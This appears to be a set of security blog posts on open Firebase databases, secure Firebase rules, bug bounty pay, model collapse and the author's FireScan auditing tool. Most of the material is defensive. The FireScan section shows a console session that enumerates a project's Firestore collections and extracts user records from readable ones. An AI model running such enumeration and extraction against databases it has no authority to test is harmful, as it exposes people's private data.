Companies don't want to admit they're using AI code review to cut costs and ship faster. They frame it as "augmenting" human reviewers. In practice, it's replacing them. And the code quality shows it.

The fix requires admitting that code review is valuable because it's slow and thoughtful, not despite it. AI tools optimised for speed and cost will never provide the same value as a senior engineer who actually understands the system.

But that requires paying senior engineers and accepting slower ship times. So instead, we'll keep using AI code review, keep shipping bugs, and keep wondering why code quality is declining.

The tools aren't making code better. They're just making it easier to pretend we reviewed it.

Test Mode to Production with Firebase

Jacob Alcock — Thu, 13 Nov 2025 07:53:34 GMT

Firebase has a "test mode" that allows anyone to read and write your entire database. Developers enable it during development and forget to change it before deploying to production.

This isn't a rare mistake. It's constant. Millions of Firebase databases are running wide open right now because someone clicked "test mode" and never looked back.

The Default

When you create a Cloud Firestore or Realtime Database instance in the Firebase console, you get two options:

Locked mode: Deny all access
Test mode: Allow all access for a month

Test mode gives you these rules:

Cloud Firestore:

rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /{document=**} {
      allow read, write: if request.time < timestamp.date(2025, 12, 1);
    }
  }
}

Realtime Database:

{
  "rules": {
    ".read": "now < 1701388800000",
    ".write": "now < 1701388800000"
  }
}

Notice the time condition. Test mode is supposed to lock down after 30 days. In theory, developers should update their rules before the deadline.

In practice, that doesn't happen.

What Actually Happens

Developers enable test mode to get started quickly. They build their app, test functionality, add features. The 30-day deadline approaches.

Firebase sends a warning email: "Your security rules will expire soon."

In insecure cases developers do one of three things:

Ignore it - the email goes to spam or gets lost
Extend the deadline - click the "extend for 30 days" button in the console
Ship insecure rules - remove the time restriction and just leave if true

Option 3 is the disaster. Once you remove the time restriction, your database is permanently wide open. No more warnings. No forced deadline. Just a production database that anyone can read and write.

The Tea App

The Tea app had 50+ million users. Their Firestore database was completely open. No authentication required. Anyone could:

Read all user data (emails, phone numbers, locations)
Modify user records
Delete accounts
Access private messages
Extract the entire database

The breach was discovered by security researchers doing routine scans. They found the database, extracted everything, and disclosed it responsibly. Tea fixed it. But the damage was done.

Why This Keeps Happening

Firebase makes it easy to be insecure

Test mode is the default suggestion. "Get started quickly!" Locked mode requires you to write rules immediately. Developers often choose the path of least resistance.

Security rules are separate from application logic

Your app code is version controlled, code reviewed, tested. Your Firebase rules are edited in a web console or deployed separately. They don't get the same scrutiny.

No forced security checks

Firebase doesn't prevent you from deploying insecure rules. You can literally ship allow read, write: if true; to production. No warnings, no confirmation dialogs, no "are you sure?"

Developers don't understand the risk

Many developers treat Firebase like a backend-as-a-service that handles security for them. They don't realise the rules they write ARE the security. If the rules say "allow access to everyone," that's exactly what happens.

Deadlines and shipping pressure

Implementing proper security rules takes time. Learning the rules language, understanding data access patterns, testing edge cases. When the deadline is tomorrow, if true ships.

Economics

Firebase's business model is based on usage. More apps using Firebase = more revenue. Making security easy would require:

Better defaults
Forced security reviews before production
Automated vulnerability scanning
Warnings for obviously insecure patterns

All of this adds friction. Friction reduces adoption. Firebase optimises for growth, not security.

Google could force developers to implement secure rules before going to production. They don't. Because the developer who can't figure out security rules will choose a different platform.

Impact

I've found hundreds of open Firebase databases during penetration tests and security research. The pattern is consistent:

Open Firestore/RTDB instances containing:

User credentials (emails, phone numbers, addresses)
Payment information (stored credit cards, transaction history)
Private messages and chat logs
Location data and tracking information
API keys and service credentials
Business data (customer lists, sales records, internal documents)

Common rule patterns:

// "Test mode" shipped to production
allow read, write: if true;

// "Any authenticated user" (not much better)
allow read, write: if request.auth != null;

// "Misconfigured cascading rules"
match /users/{userId} {
  allow read: if true;
  match /private/{document} {
    allow read: if false; // This doesn't work, parent rule grants access
  }
}

What You Should Do

Never use test mode

Start with locked mode. Write rules from day one. Don't use test mode "just for development" because it’s much harder to add rules retrospectively or worse you will forget to change it.

Version control your rules

Include firestore.rules or database.rules.json in your repository. Review changes like you review code.

Test your rules

Use the Firebase Emulator to test rules locally. Write unit tests for your security rules. Don't rely on "it works in the console."

Audit production rules regularly

Set up monitoring for rule changes. Review your production rules monthly. Check for patterns like if true or missing auth checks.

Use the principle of least privilege

Default to denying access. Only grant access where specifically needed. Don't use match /{document=**} with broad permissions.

Understand cascading rules

In Realtime Database, parent rules override child rules. You can't restrict access at a child path if you granted it at a parent path.

Use a tool to audit

Run an audit before launching or during changes to ensure your infrastructure is secure with something like my tool, FireScan.

Final Thoughts

Firebase test mode is a trap. It's designed to get developers started quickly, but it creates a ticking time bomb if you forget to update your rules.

The 30-day expiration is supposed to prevent this. In practice, developers extend it or remove it entirely. Firebase doesn't prevent this because preventing it would create friction.

The security model is fundamentally broken: Firebase gives developers complete control over security through a complex rules language, then provides a "skip security" button (test mode) for convenience.

Developers click the skip button. They ship to production. They expose millions of user records. Firebase sends warning emails that get ignored.

The cycle continues. And millions of databases remain wide open because nobody forced the developer to understand security rules before deploying.

If you're using Firebase: audit your rules. Today. Don't trust that you "probably fixed it." Check your rules in the Firebase console right now.

The next person who discovers your open database might not disclose it responsibly.

Bug Bounty Platforms Are Exploiting Researchers

Jacob Alcock — Tue, 11 Nov 2025 21:33:34 GMT

Bug bounty platforms claim to connect security researchers with companies. In reality, they're intermediaries extracting value from both sides while researchers do skilled labor for poor wages.

The economics are broken. Companies get critical vulnerabilities fixed for less than a junior developer's daily rate. Platforms take 20% cuts for running a web form. Researchers get paid $500 for finding bugs that would cost $50,000 or more on the gray market.

Nobody in this equation benefits except the platforms. A critical remote code execution vulnerability in a SaaS product should be worth significantly more than what bug bounty programs pay. Here's the actual market rate comparison:

Bug Bounty Program: $500 - $5,000
Responsible Disclosure (no bounty): $0
Gray Market (Zerodium, etc.): $50,000 - $500,000
Nation-State Buyers: $500,000 - $2,500,000

The gap between bug bounty payouts and actual market value is 100x to 500x. Researchers are expected to do the right thing while leaving 99% of the value on the table.

Economics

Most bug bounty platforms take a 20% cut. Some charge companies setup fees, monthly fees, or take even larger percentages. Here's what that looks like:

Researcher finds critical RCE: 40 hours of work
Company bounty: $2,500 Platform cut (20%): $500
Researcher payout: $2,000
Effective hourly rate: $50/hour

That $50/hour is before:

Taxes (20-40% depending on jurisdiction and other factors)
Time spent on duplicates and rejected reports
Infrastructure costs (VPS, tools, domains for testing)
Unpaid time learning and researching new vulnerabilities

Real effective rate after accounting for all work: $15-20/hour for skilled security work.

Meanwhile, penetration testers bill $200-400/hour. The same researcher doing the same work gets paid 10-20x less through bug bounties.

Duplicates

Most serious vulnerabilities are found within hours of program launch by multiple researchers simultaneously. Only the first report gets paid.

You spend 20 hours finding a critical SQL injection. You write a detailed report with proof-of-concept, impact analysis, and remediation steps. You submit it.

"Duplicate. This was already reported 30 minutes ago."

You get $0. The platform still takes their 20% from the other researcher's payout. You subsidised their business model with free labor.

Triage

Bug bounty platforms employ "triage teams" to review submissions. In theory, this helps companies by filtering out noise. In practice, it adds another layer that doesn't understand the reported vulnerability.

I've seen critical vulnerabilities marked as "informational" by triage teams because they didn't understand the exploit chain. I've seen SQLi marked as duplicate of XSS because both were "injection vulnerabilities." I've seen valid reports closed as "won't fix" and then silently patched two weeks later with no payout.

The triage team has zero incentive to advocate for researchers. They're paid by the platform, which is paid by companies. Their incentive is to minimise payouts and close reports quickly.

Scope Creep and Retroactive Rules

You spend weeks testing a target. You find a critical vulnerability in a domain that's in scope. You report it.

"Out of scope. We updated the scope yesterday to exclude that subdomain."

Or:

"This type of vulnerability is excluded per our policy update from last week."

Or my personal favorite:

"This is a duplicate of a vulnerability we fixed last year and never disclosed."

Bug bounty programs can change rules retroactively. Researchers have no recourse. The platform sides with the paying customer (the company) every time.

A Race to the Bottom

Because bug bounties pay so little, they attract researchers who:

Are in countries with low cost of living
Are students/hobbyists who don't value their time
Use automated scanners and submit everything (creating noise)
Don't know their work is worth 100x more

This creates a race to the bottom. Why would a company pay $10,000 when someone in a developing country will report it for $500? Why would platforms advocate for higher payouts when volume is more profitable than quality?

The result: experienced researchers leave the bug bounty ecosystem. Quality of reports declines. Companies get flooded with low-quality automated scanner output. Everyone loses except the platforms, who get paid per report processed.

Publicity

Many bug bounty programs exist purely for PR. "We have a bug bounty program" signals that the company takes security seriously. The actual payouts tell a different story:

Maximum bounty: $10,000 (looks good in marketing)
Average bounty paid: $150
Median bounty paid: $50
Number of critical vulnerabilities found: 47
Highest payout for critical vulnerability: $500

The "$10,000 maximum bounty" is marketing. The reality is $50 for finding exploitable bugs in production systems.

"Exposure"

Platforms and companies defend low bounties with:

"You get exposure!" "You're building your reputation!" "It's responsible disclosure!" "Think of it as practice!"

This is the same argument used to exploit artists, musicians, and writers. "Work for free/cheap for the exposure."

Security researchers don't need exposure. They need money. Skills that find RCE in production systems are worth real money. Asking researchers to work for "reputation points" while companies save millions on security audits is exploitation.

What Companies Are Actually Saving

A professional penetration test costs $5,000 - $50,000+ depending on scope. Companies using bug bounties as their primary security testing model are getting:

Continuous testing (not point-in-time)
Diverse researcher skill sets
Global coverage (researchers in all time zones)
No upfront costs
Pay-per-vulnerability instead of flat fee

A bug bounty program that pays out $100,000/year is replacing $500,000+ worth of professional security testing. The platform takes $20,000 of that. Researchers split $80,000 while doing half a million dollars worth of work.

The value extraction is staggering.

Revenue Models

Bug bounty platforms are profitable businesses. HackerOne, Bugcrowd, Synack - all have raised hundreds of millions in VC funding. Their unit economics work because:

Take 20% of all payouts (pure margin)
Charge companies platform fees
Sell "managed programs" at premium prices
Pay researchers as little as possible
No inventory, no overhead, no liability

It's a classic marketplace play: connect two sides, extract maximum value, provide minimum infrastructure.

The researcher does the skilled work. The company gets the value. The platform takes the cut. Who's being exploited here?

What Actually Needs to Change

Minimum bounty standards: Critical vulnerabilities should have floor prices ($10,000+)
No platform cuts on bounties: Platforms should charge companies directly, not take cuts from researcher payouts
Duplicate protection: If multiple researchers find the same bug within a reasonable window, split the bounty
Binding scope: Companies can't change scope retroactively to avoid payouts
Independent arbitration: Disputes resolved by third parties, not platform-employed triage teams
Disclosure rights: Researchers can disclose after 90 days regardless of fix status

None of this will happen voluntarily. Platforms are profitable under the current model. Companies get cheap security testing. Researchers lack negotiating power.

Final Thoughts

Bug bounty platforms have successfully convinced the security industry that paying researchers 1% of market value is "ethical" and "responsible."

It's not. It's exploitation with good PR.

The platforms extract value by positioning themselves between researchers and companies, taking cuts while providing minimal infrastructure. Companies get professional security testing at fraction of market rates. Researchers get poverty wages for skilled work.

The bug bounty model could work if payouts reflected actual value. A critical RCE should pay $50,000, not $500. Platforms should charge companies service fees, not extract from researcher payouts. Duplicates should be handled fairly.

But that would require platforms to care about researchers as much as they care about companies. And companies are the ones paying the bills.

So instead, we have a system that works great for platforms and companies, and barely works for researchers. And we call it "ethical hacking."

The economics are broken. The incentives are broken. The only question is how long researchers will keep accepting it.

How to Write Secure Firebase Rules

Jacob Alcock — Sun, 09 Nov 2025 17:43:37 GMT

Firebase Security Rules are the only thing protecting your data from unauthorised access. This guide covers how to write rules that actually secure your app.

Understanding the Basics

Firebase Security Rules work by matching paths and applying conditions. If the condition evaluates to true, the request is allowed. If false, it's denied.

Cloud Firestore Rules Structure

rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // Your rules go here
    match /collection/{document} {
      allow read, write: if ;
    }
  }
}

Realtime Database Rules Structure

{
  "rules": {
    "path": {
      ".read": "",
      ".write": ""
    }
  }
}

Key Concepts

Match blocks: Define which paths the rule applies to
Allow statements: Specify what operations are permitted
Conditions: Boolean expressions that grant or deny access
Variables: request (incoming request data) and resource (existing data)

Rule Methods

Firestore rules support granular methods:

read: Covers both get (single document) and list (queries)
write: Covers create, update, and delete
get: Read a single document
list: Read queries and collections
create: Write new documents
update: Modify existing documents
delete: Remove documents

// Granular control
match /posts/{postId} {
  allow get: if true;  // Anyone can read a single post
  allow list: if request.auth != null;  // Only authenticated users can query
  allow create: if request.auth != null;  // Only authenticated users can create
  allow update: if request.auth.uid == resource.data.authorId;  // Only author can update
  allow delete: if request.auth.uid == resource.data.authorId;  // Only author can delete
}

Common Secure Patterns

Pattern 1: User Can Only Access Their Own Data

Use case: User profiles, private documents, personal settings

Firestore:

match /users/{userId} {
  allow read, write: if request.auth != null && request.auth.uid == userId;
}

Realtime Database:

{
  "rules": {
    "users": {
      "$userId": {
        ".read": "$userId === auth.uid",
        ".write": "$userId === auth.uid"
      }
    }
  }
}

Pattern 2: Public Read, Authenticated Write

Use case: Blog posts, public content, product listings

Firestore:

match /posts/{postId} {
  allow read: if true;
  allow create: if request.auth != null;
  allow update, delete: if request.auth != null
                         && request.auth.uid == resource.data.authorId;
}

Realtime Database:

{
  "rules": {
    "posts": {
      "$postId": {
        ".read": true,
        ".write": "auth != null && (!data.exists() || data.child('authorId').val() === auth.uid)"
      }
    }
  }
}

Pattern 3: Role-Based Access Using Custom Claims

Use case: Admin panels, multi-role applications

Setup custom claims (server-side):

const admin = require('firebase-admin');

// Set custom claims
await admin.auth().setCustomUserClaims(uid, { admin: true });

Firestore rules:

match /adminData/{document} {
  allow read, write: if request.auth.token.admin == true;
}

match /posts/{postId} {
  allow read: if true;
  allow write: if request.auth.token.editor == true
               || request.auth.token.admin == true;
}

Realtime Database:

{
  "rules": {
    "adminData": {
      ".read": "auth.token.admin === true",
      ".write": "auth.token.admin === true"
    }
  }
}

Pattern 4: Data Validation

Use case: Ensuring data format and required fields

Firestore:

match /posts/{postId} {
  allow create: if request.auth != null
                && request.resource.data.keys().hasAll(['title', 'content', 'authorId'])
                && request.resource.data.title is string
                && request.resource.data.title.size() > 0
                && request.resource.data.title.size() < 200
                && request.resource.data.authorId == request.auth.uid;

  allow update: if request.auth != null
                && request.auth.uid == resource.data.authorId
                && request.resource.data.authorId == resource.data.authorId; // Prevent changing author
}

Realtime Database:

{
  "rules": {
    "posts": {
      "$postId": {
        ".write": "auth != null && newData.hasChildren(['title', 'content', 'authorId'])",
        "title": {
          ".validate": "newData.isString() && newData.val().length > 0 && newData.val().length < 200"
        },
        "authorId": {
          ".validate": "newData.val() === auth.uid && (!data.exists() || data.val() === newData.val())"
        }
      }
    }
  }
}

Pattern 5: Attribute-Based Access (Data-Driven Roles)

Use case: Shared documents, team access, permission-based systems

Firestore:

match /projects/{projectId} {
  allow read: if request.auth != null
              && request.auth.uid in resource.data.members;

  allow write: if request.auth != null
               && request.auth.uid in resource.data.admins;
}

Realtime Database:

{
  "rules": {
    "projects": {
      "$projectId": {
        ".read": "auth != null && data.child('members').child(auth.uid).exists()",
        ".write": "auth != null && data.child('admins').child(auth.uid).exists()"
      }
    }
  }
}

Using Functions for Reusable Logic

Functions make rules more maintainable and readable.

rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {

    // Check if user is authenticated
    function isSignedIn() {
      return request.auth != null;
    }

    // Check if user owns the resource
    function isOwner(userId) {
      return request.auth.uid == userId;
    }

    // Check if user has a specific role
    function hasRole(role) {
      return isSignedIn() && request.auth.token[role] == true;
    }

    // Validate required fields
    function hasRequiredFields(fields) {
      return request.resource.data.keys().hasAll(fields);
    }

    // Use the functions
    match /users/{userId} {
      allow read: if isSignedIn();
      allow write: if isOwner(userId);
    }

    match /posts/{postId} {
      allow create: if isSignedIn()
                    && hasRequiredFields(['title', 'content', 'authorId'])
                    && isOwner(request.resource.data.authorId);

      allow update: if isOwner(resource.data.authorId);
      allow delete: if isOwner(resource.data.authorId) || hasRole('admin');
    }
  }
}

Handling Subcollections

In Firestore, rules don't cascade to subcollections. You must explicitly define rules for each level.

match /users/{userId} {
  allow read: if request.auth.uid == userId;

  // Subcollection requires its own rules
  match /privateData/{document} {
    allow read, write: if request.auth.uid == userId;
  }

  // Another subcollection
  match /posts/{postId} {
    allow read: if true;  // Public read
    allow write: if request.auth.uid == userId;  // Only owner can write
  }
}

Important: A match like /users/{userId}/{document=**} will match ALL nested subcollections recursively. Use this carefully.

// This matches /users/{userId}/anything/at/any/depth
match /users/{userId}/{document=**} {
  allow read: if request.auth.uid == userId;
}

Realtime Database: Cascading Rules

In Realtime Database, rules CASCADE. Parent rules override child rules.

{
  "rules": {
    "users": {
      // This grants read access to all user data
      ".read": "auth != null",
      "$userId": {
        // This CANNOT restrict the read access granted above
        ".read": "$userId === auth.uid",  // This is IGNORED
        ".write": "$userId === auth.uid"
      }
    }
  }
}

Correct approach: Don't grant broad access at parent levels.

{
  "rules": {
    "users": {
      "$userId": {
        ".read": "$userId === auth.uid",
        ".write": "$userId === auth.uid"
      }
    }
  }
}

Testing Your Rules

Use FireScan

Try out my purpose built tool for auditing firebase infrastructure. It’s completely free, open-source and available for anyone to use. Check it out here.

Use the Firebase Emulator

Install and run locally:

npm install -g firebase-tools
firebase init emulators
firebase emulators:start

Use the Rules Simulator in Firebase Console

Navigate to Firestore/Realtime Database → Rules → Playground

Select operation type (get, list, create, etc.)
Choose authenticated or unauthenticated
Specify the path
Run simulation

This is useful for quick checks but not a substitute for proper testing.

Common Mistakes to Avoid

1. Using `if true` in Production

// NEVER DO THIS
match /{document=**} {
  allow read, write: if true;
}

2. Relying Only on `request.auth != null`

// This allows ANY authenticated user to access ANY data
match /users/{userId} {
  allow read, write: if request.auth != null;  // Too permissive
}

// Better: verify the user matches
match /users/{userId} {
  allow read, write: if request.auth != null && request.auth.uid == userId;
}

3. Forgetting Realtime Database Cascade Rules

{
  "rules": {
    "data": {
      ".read": true,  // Grants read to everything below
      "private": {
        ".read": false  // This is IGNORED, read was already granted above
      }
    }
  }
}

4. Not Validating Data on Create/Update

// Bad: No validation
match /posts/{postId} {
  allow create: if request.auth != null;
}

// Good: Validate required fields and author
match /posts/{postId} {
  allow create: if request.auth != null
                && request.resource.data.keys().hasAll(['title', 'content', 'authorId'])
                && request.resource.data.authorId == request.auth.uid;
}

5. Allowing Field Modification That Shouldn't Change

// Bad: User can change the author
match /posts/{postId} {
  allow update: if request.auth.uid == resource.data.authorId;
}

// Good: Prevent changing the author field
match /posts/{postId} {
  allow update: if request.auth.uid == resource.data.authorId
                && request.resource.data.authorId == resource.data.authorId;
}

6. Overusing `get()` and `exists()`

Each get() or exists() call in your rules counts as a read operation and costs money. You're also limited to 10 calls per request.

// Bad: Multiple get() calls
match /posts/{postId} {
  allow read: if get(/databases/$(database)/documents/users/$(request.auth.uid)).data.role == 'reader'
              || get(/databases/$(database)/documents/users/$(request.auth.uid)).data.role == 'admin';
}

// Better: Use custom claims or structure data differently
match /posts/{postId} {
  allow read: if request.auth.token.reader == true
              || request.auth.token.admin == true;
}

Version Control Your Rules

Keep your rules in source control alongside your code.

Add to .gitignore if needed:

# Don't ignore rules files
!firestore.rules
!database.rules.json

Example firestore.rules:

rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // All your rules here
  }
}

Deploy with Firebase CLI:

firebase deploy --only firestore:rules
firebase deploy --only database

Deployment Checklist

Before deploying rules to production:

Remove all if true or if false test rules
Verify authentication checks on all sensitive paths
Test rules using the emulator with unit tests
Check for cascading rule issues (Realtime Database)
Validate required fields on create/update operations
Ensure users can't modify fields they shouldn't (like authorId)
Review get() and exists() usage (limit of 10 per request)
Test with authenticated and unauthenticated contexts
Version control your rules
Use firebase deploy --only firestore:rules (don't deploy everything)

Complete Example: Blog Application

Here's a complete, production-ready ruleset for a blog app:

rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {

    // Helper functions
    function isSignedIn() {
      return request.auth != null;
    }

    function isOwner(uid) {
      return isSignedIn() && request.auth.uid == uid;
    }

    function isAdmin() {
      return isSignedIn() && request.auth.token.admin == true;
    }

    // User profiles
    match /users/{userId} {
      allow read: if isSignedIn();
      allow create: if isOwner(userId)
                    && request.resource.data.keys().hasAll(['displayName', 'email'])
                    && request.resource.data.email == request.auth.token.email;
      allow update: if isOwner(userId)
                    && request.resource.data.email == resource.data.email; // Prevent email change
      allow delete: if isOwner(userId) || isAdmin();
    }

    // Blog posts
    match /posts/{postId} {
      allow read: if resource.data.published == true || isOwner(resource.data.authorId) || isAdmin();
      allow create: if isSignedIn()
                    && request.resource.data.keys().hasAll(['title', 'content', 'authorId', 'published', 'createdAt'])
                    && isOwner(request.resource.data.authorId)
                    && request.resource.data.title is string
                    && request.resource.data.title.size() > 0
                    && request.resource.data.title.size() <= 200
                    && request.resource.data.createdAt == request.time;
      allow update: if isOwner(resource.data.authorId)
                    && request.resource.data.authorId == resource.data.authorId  // Prevent author change
                    && request.resource.data.createdAt == resource.data.createdAt;  // Prevent timestamp change
      allow delete: if isOwner(resource.data.authorId) || isAdmin();

      // Comments subcollection
      match /comments/{commentId} {
        allow read: if true;
        allow create: if isSignedIn()
                      && request.resource.data.keys().hasAll(['text', 'authorId', 'createdAt'])
                      && isOwner(request.resource.data.authorId)
                      && request.resource.data.text.size() > 0
                      && request.resource.data.text.size() <= 1000;
        allow update: if isOwner(resource.data.authorId)
                      && request.resource.data.authorId == resource.data.authorId;
        allow delete: if isOwner(resource.data.authorId) || isAdmin();
      }
    }
  }
}

Final Thoughts

Default to denying access. Only grant permissions where specifically needed.
Always verify authentication with request.auth != null and check user ownership.
Validate data on create and update operations.
Prevent field tampering by ensuring critical fields don't change on update.
Use custom claims for roles instead of repeated get() calls.
Test your rules with the emulator and unit tests before deploying.
Version control your rules and review changes like code.
Understand cascading (Realtime Database) vs explicit subcollection rules (Firestore).

Firebase Security Rules are powerful but require careful implementation. Take the time to write them correctly, test them thoroughly, and audit them regularly.

Your rules are the only thing standing between your data and unauthorised access. Make them count.

Model Collapse: The AI Feedback Loop Problem Nobody Wants to Talk About

Jacob Alcock — Fri, 07 Nov 2025 21:22:55 GMT

AI models are eating their own tail, and it's going to be a problem.

The entire premise of modern LLMs is that they're trained on human-generated content. Books, articles, research papers, Stack Overflow answers, GitHub repositories - billions of tokens of actual human knowledge. But that assumption is breaking down faster than anyone wants to admit.

The Core Issue

As we approach the end of 2025, the web is saturated with AI-generated content:

Stack Overflow answers copy-pasted from ChatGPT
GitHub repos with AI-generated documentation and comments
Blog posts churned out by content farms using GPT
Social media posts from bots
Technical articles written entirely by LLMs

Yet AI companies still scrape the web for training data. They can't reliably distinguish human content from synthetic content. Which means the next generation of models will inevitably train on the outputs of previous models.

This is model collapse. And it's not theoretical - it's measurable, reproducible, and already happening.

How Model Collapse Works

The feedback loop is straightforward:

Gen 1: Train on 95% human data, 5% AI slop → minor quality issues
Gen 2: Train on 80% human data, 20% AI content → noticeable degradation
Gen 3: Train on 60% human data, 40% AI outputs → significant problems
Gen 4: Train on majority AI-generated content → model collapse

Each generation compounds the problems:

Loss of diversity - outputs converge toward homogeneous, repetitive patterns
Amplified biases - quirks from previous models get magnified
Increased hallucinations - errors stack across generations
Tail knowledge disappears - rare but critical information gets filtered out first

It's the same principle as photocopying a photocopy. Each iteration degrades the original.

Why You Should Care

Code quality degradation

If Copilot trains on AI-generated code that was itself generated by an earlier model, code suggestions degrade. You're not getting patterns from experienced developers anymore - you're getting averaged-out slop that "looks" like code.

Security implications

AI-assisted security tools trained on AI-generated vulnerability analyses will miss things. If the training data is full of hallucinated CVE details or incorrect exploit explanations, the model learns wrong information.

Knowledge erosion

Niche technical knowledge - the kind buried in obscure forum posts, old mailing lists, and forgotten documentation - disappears first. AI models optimise for common patterns. Rare but critical knowledge gets filtered out.

Trust degradation

You can't tell anymore if that blog post explaining a security vulnerability was written by someone who actually found and tested it, or by an LLM that pieced together fragments from six different sources and hallucinated the rest.

Proposed Solutions (And Why They're All Flawed)

Watermarking

Embed cryptographic signatures in AI outputs to filter them during training. Google and OpenAI are researching this. Problem: watermarks can be stripped. It's an arms race.

Provenance tracking

Track the origin of all training data. Only use verified human content. Problem: doesn't scale. The entire value proposition of LLMs is training on massive web-scale datasets.

Curated datasets

Stop scraping the web entirely. Build human-verified, high-quality datasets. Problem: expensive, slow, and fundamentally limits what the model can learn.

Adversarial filtering

Train models to detect and exclude AI-generated text. Problem: classic adversarial arms race. Detection improves, generation improves to evade detection, repeat forever.

Controlled synthetic mixing

Carefully balance the ratio of real to synthetic data. Problem: requires knowing the exact contamination threshold, which varies by domain and model architecture.

None of these solve the core issue. And we might already be past the point of no return. The web is saturated with AI slop. Even if filtering started today, there are years of contamination already baked into datasets.

The Actual Problem

We're running a one-way experiment on the future of LLMs, and nobody knows the safe parameters.

No one knows what percentage of AI contamination causes collapse. No one knows if current models are already degraded. No one knows how to reverse contamination once it's in the dataset.

LLMs were built on the assumption of abundant, renewable human knowledge. But that assumption was wrong. We're strip-mining the web for training data, and the mine doesn't refill. Every piece of human writing that gets replaced with AI slop permanently degrades the training pool.

The Economic Incentive Problem

The economics make this worse. AI companies have no incentive to solve this:

Scraping is free (legally questionable, but free)
Filtering costs money
Competition doesn't care about data quality 5 years from now
Investors reward shipping features, not long-term dataset integrity

Publishers can't win either. Paywalling content to prevent scraping also blocks legitimate human readers. Not paywalling means getting drained by RAG systems that plagiarise without attribution.

Content creators lose traffic and revenue to AI summaries. So they either stop producing content (reducing the pool of human knowledge) or start using AI to produce more content faster (contaminating the pool).

It's a race to the bottom, and every participant is incentivised to make it worse.

What Actually Needs to Happen

The realistic options are limited:

Legislation requiring training data transparency - companies must disclose what they trained on and prove licensing rights
Mandatory AI content labeling - cryptographic signatures that can't be easily stripped
Royalty systems for scraped content - similar to how music licensing works
Incentivise human-generated content - platforms that verify and reward genuine human writing

None of this will happen voluntarily. The industry is too profitable and moving too fast. Regulation would need to come first, and regulators barely understand the technology.

More likely: we hit model collapse in 3-5 years, everyone scrambles to fix it retroactively, and we end up with some half-botched solution that only partially works.

Final Thoughts

Model collapse is not a hypothetical future problem. It's happening now, measurably, in controlled experiments. The only question is whether we're already seeing it in production models.

The feedback loop is real. The economic incentives ensure it will continue. And the proposed solutions all have fundamental flaws that make them unlikely to work at scale.

I'm not saying LLMs are doomed. I'm saying the current trajectory is unsustainable, and nobody with the power to fix it has an incentive to do so. The companies building these models are optimising for next quarter's revenue, not training data quality in 2030.

This will either get fixed through heavy-handed regulation, or we'll collectively find out what happens when AI models train on increasingly degraded synthetic data. My money is on the latter.

The snake is already eating its tail. We're just waiting to see how far down it gets before someone notices.

Research:

Is Model Collapse Inevitable? (Matthias Gerstgrasser et al., 2024)
The Curse of Recursion (Ilia Shumailov et al., 2024)
AI models collapse when trained on recursively generated data (Ilia Shumailov et al., 2024)
New research warns of potential ‘collapse’ of machine learning models

Firebase Security Is Broken. Here's the Tool I Built to Fix It.

Jacob Alcock — Fri, 07 Nov 2025 09:00:23 GMT

A couple of months ago I was doing a few penetration tests recently when I encountered Firebase configurations. Each time, I found myself stringing together a bunch of cURL commands and one-off Python scripts to check for common misconfigurations. After the third engagement, I realised this was pretty inefficient.

I was looking for a tool where I could just set the configuration and run enumeration checks. Something like msfconsole but for Firebase. I couldn't find anything that fit the bill, so I built it myself.

The Problem

Firebase is incredibly popular - it powers millions of apps. But its security model is... tricky. The core issue is that Firebase uses declarative security rules. A single || operator in the wrong place can expose your entire database.

During pentests, I kept seeing the same patterns:

RTDB nodes readable without authentication
Firestore collections with open read rules
Cloud Storage buckets listing all files
Cloud Functions without proper auth checks

The Tea app breach is a perfect example - misconfigured Firestore rules exposed sensitive user data. This wasn't a sophisticated attack, it was just someone checking if default or weak rules were still in place.

What I Wanted

Coming from a pentesting background, I needed something that:

Works with minimal information (i.e. Just the projectID and web API key)
Tests comprehensively
Is safe by default (Won't accidentally damage production data)
Handles authentication properly
Scales to large wordlists

None of the existing tools checked all these boxes.

Introducing FireScan

FireScan is a tool designed for penetration testers and developers to audit the security posture of Firebase projects. It provides an interactive console to enumerate databases, test storage rules, check function security, and much more, all from a single, easy-to-use interface.

$ firescan
███████╗██╗██████╗ ███████╗███████╗ ██████╗ █████╗ ███╗   ██╗
██╔════╝██║██╔══██╗██╔════╝██╔════╝██╔════╝██╔══██╗████╗  ██║
█████╗  ██║██████╔╝█████╗  ███████╗██║     ███████║██╔██╗ ██║
██╔══╝  ██║██╔══██╗██╔══╝  ╚════██║██║     ██╔══██║██║╚██╗██║
██║     ██║██║  ██║███████╗███████║╚██████╗██║  ██║██║ ╚████║
╚═╝     ╚═╝╚═╝  ╚═╝╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═══╝

FireScan v1.0 - The Firebase Security Auditor

firescan > set projectID my-app-12345
firescan > set apiKey AIza...
firescan > auth --create-account
✓ Successfully authenticated
firescan > scan --all
Key Features

Example

Here's a real scenario from a recent test without the real data:

firescan > set projectID example-app-abc123 
firescan > set apiKey AIzaSy... 
firescan > auth --create-account
firescan > scan --firestore -l all
[✓] Scanning... [Checked: 200/200 | Found: 4]

[Firestore] Vulnerability Found! ├── Timestamp: 2025-01-15T10:23:45Z ├── Severity: High ├── Type: Firestore └── Path: users

[Firestore] Vulnerability Found! ├── Timestamp: 2025-01-15T10:23:47Z ├── Severity: High ├── Type: Firestore └── Path: messages

firescan > extract --firestore --path users 
{ "documents": 
    [ { "DOCUMENT_ID": "user_12345", "email": "john.doe@example.com", "name": "John Doe", ... } ] 
}

In under 2 minutes, I found two readable collections and extracted the data. Without FireScan, this would have taken me 20 minutes of manual curl commands.

Try It Out

https://github.com/JacobDavidAlcock/firescan